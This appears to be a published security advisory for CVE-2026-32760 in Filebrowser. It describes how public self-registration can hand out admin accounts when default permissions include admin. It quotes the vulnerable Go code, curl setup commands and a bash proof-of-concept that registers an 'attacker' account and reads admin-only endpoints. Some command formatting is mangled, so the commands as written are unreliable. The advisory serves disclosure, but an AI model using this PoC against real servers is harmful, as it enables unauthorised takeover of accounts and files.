PT-2026-25858 · Go · Github.Com/Filebrowser/Filebrowser/V2

Published

2026-03-16

·

Updated

2026-03-16

·

CVE-2026-32760

CVSS v4.0
10
VectorAV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Summary

Any unauthenticated visitor can register a full administrator account when self-registration (
signup = true
) is enabled and the default user permissions have 
perm.admin = true
. The signup handler blindly applies all default settings - including 
Perm.Admin
- to the new user without any server-side guard that strips admin from self-registered accounts.

Details

Affected file: 
http/auth.go
Vulnerable code:
// signupHandler (http/auth.go)
user := &users.User{
  Username: info.Username,
}
d.settings.Defaults.Apply(user)  // ← copies Perm.Admin = true if set in defaults
// NO guard: user.Perm.Admin is never cleared here
settings.UserDefaults.Apply
(settings/defaults.go):
func (d *UserDefaults) Apply(u *users.User) {
  u.Perm = d.Perm  // copies full Permissions struct, including Admin field
  ...
}
Settings API permits Admin in defaults (http/settings.go):
var settingsPutHandler = withAdmin(func( http.ResponseWriter, r *http.Request, d *data) (int, error) {
  ...
  d.settings.Defaults = req.Defaults // Admin can set Defaults.Perm.Admin = true
  ...
})
The 
signupHandler
is supposed to create unprivileged accounts for new visitors. It contains no explicit 
user.Perm.Admin = false
reset after 
Defaults.Apply
. If an administrator (intentionally or accidentally) configures 
defaults.perm.admin = true
and also enables signup, every account created via the public registration endpoint is an administrator with full control over all files, users, and server settings.

Demo Server Setup

# Pull latest release
docker run -d --name fb-test 
 -p 8080:80 
 -v /tmp/fb-data:/srv 
 filebrowser/filebrowser:v2.31.2

# Wait for startup, then set defaults.perm.admin = true
ADMIN TOKEN=$(curl -s -X POST http://localhost:8080/api/login 
 -H 'Content-Type: application/json' 
 -d '{"username":"admin","password":"admin"}')

# Enable signup and set admin as default permission
curl -s -X PUT http://localhost:8080/api/settings 
 -H "X-Auth: $ADMIN TOKEN" 
 -H 'Content-Type: application/json' 
 -d '{
  "signup": true,
  "defaults": {
   "perm": {
    "admin": true,
    "execute": true,
    "create": true,
    "rename": true,
    "modify": true,
    "delete": true,
    "share": true,
    "download": true
   }
  }
 }'

PoC Exploit

#!/bin/bash
# poc signup admin.sh
# Demonstrates: unauthenticated signup → admin account

TARGET="http://localhost:8080"

echo "[*] Registering attacker account via public signup endpoint..."
STATUS=$(curl -s -o /dev/null -w "%{http code}" 
 -X POST "$TARGET/api/signup" 
 -H "Content-Type: application/json" 
 -d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Signup response: HTTP $STATUS"

echo "[*] Logging in as newly created account..."
ATTACKER TOKEN=$(curl -s -X POST "$TARGET/api/login" 
 -H "Content-Type: application/json" 
 -d '{"username":"attacker","password":"Attack3r!pass"}')

echo "[*] Fetching user list with attacker token (admin-only endpoint)..."
curl -s "$TARGET/api/users" 
 -H "X-Auth: $ATTACKER TOKEN" | python3 -m json.tool

echo ""
echo "[*] Verifying admin access by reading /api/settings..."
curl -s "$TARGET/api/settings" 
 -H "X-Auth: $ATTACKER TOKEN" | python3 -m json.tool
Expected output: The attacker's token successfully returns the full user list and server settings - endpoints restricted to 
Perm.Admin = true
users.

Impact

Any unauthenticated visitor who can reach 
POST /api/signup
obtains a full admin account. From there, they can:
  • List, read, modify, and delete every file on the server
  • Create, modify, and delete all other users
  • Change authentication method and server settings
  • Execute arbitrary commands if 
    enableExec = true

Fix

Improper Access Control

Improper Privilege Management

Weakness Enumeration

CWE-284CWE-269

Related Identifiers

CVE-2026-32760
GHSA-5GG9-5G7W-HM73

Affected Products

Github.Com/Filebrowser/Filebrowser/V2